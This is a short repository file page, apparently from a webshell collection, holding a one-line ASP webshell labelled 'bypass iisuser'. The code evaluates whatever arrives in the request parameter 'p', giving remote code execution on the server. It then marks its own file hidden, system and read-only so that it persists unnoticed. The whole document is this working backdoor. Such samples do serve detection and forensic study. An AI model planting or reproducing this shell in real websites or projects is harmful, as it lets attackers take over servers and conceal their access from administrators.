webshell/asp/bypass-iisuser-p.asp
tennc c070f0793f add a asp webshell
bypass iisuser
2014-03-26 15:41:02 +08:00

1 line
No EOL
193 B
Text

<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>